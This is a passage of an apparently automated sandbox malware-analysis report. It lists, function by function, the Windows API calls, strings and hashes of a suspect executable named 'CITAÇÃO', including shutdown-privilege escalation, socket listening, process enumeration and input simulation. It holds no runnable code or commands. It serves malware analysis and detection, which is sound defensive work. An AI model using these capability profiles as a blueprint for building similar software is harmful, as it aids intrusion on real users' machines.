                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • __wsplitpath.LIBCMT ref: 00403492
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcscpy.LIBCMT ref: 004034A7
                                                      • _wcscat.LIBCMT ref: 004034BC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                      • _wcscpy.LIBCMT ref: 004035A0
                                                      • _wcslen.LIBCMT ref: 00403623
                                                      • _wcslen.LIBCMT ref: 0040367D
                                                      Strings
                                                      • Error opening the file, xrefs: 00428231
                                                      • Unterminated string, xrefs: 00428348
                                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                      • _, xrefs: 0040371C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                      • API String ID: 3393021363-188983378
                                                      • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                      • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                      • __swprintf.LIBCMT ref: 00431C2E
                                                      • _wcslen.LIBCMT ref: 00431C3A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                      Strings
                                                      Similarity
                                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2192556992-3457252023
                                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                      • __swprintf.LIBCMT ref: 004722B9
                                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                      Strings
                                                      Similarity
                                                      • API ID: FolderPath$LocalTime__swprintf
                                                      • String ID: %.3d
                                                      • API String ID: 3337348382-986655627
                                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                      • GetLastError.KERNEL32 ref: 00433414
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                      Strings
                                                      Similarity
                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 2938487562-3733053543
                                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                      APIs
                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                      Similarity
                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 1255039815-0
                                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00433073
                                                      • __swprintf.LIBCMT ref: 00433085
                                                      • __wcsicoll.LIBCMT ref: 00433092
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                      • LockResource.KERNEL32(?), ref: 00433120
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                      • String ID:
                                                      • API String ID: 1158019794-0
                                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                      APIs
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_strncmp
                                                      • String ID: @oH$\$^$h
                                                      • API String ID: 2175499884-3701065813
                                                      • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                      • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                      • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                      • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                      • API String ID: 0-2872873767
                                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                      • __wsplitpath.LIBCMT ref: 00475644
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcscat.LIBCMT ref: 00475657
                                                      • __wcsicoll.LIBCMT ref: 0047567B
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID:
                                                      • API String ID: 2547909840-0
                                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                      • FindClose.KERNEL32(?), ref: 004525FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                      • String ID: *.*$\VH
                                                      • API String ID: 2786137511-2657498754
                                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID: pqI
                                                      • API String ID: 2579439406-2459173057
                                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                      APIs
                                                      • __wcsicoll.LIBCMT ref: 00433349
                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                      • __wcsicoll.LIBCMT ref: 00433375
                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicollmouse_event
                                                      • String ID: DOWN
                                                      • API String ID: 1033544147-711622031
                                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
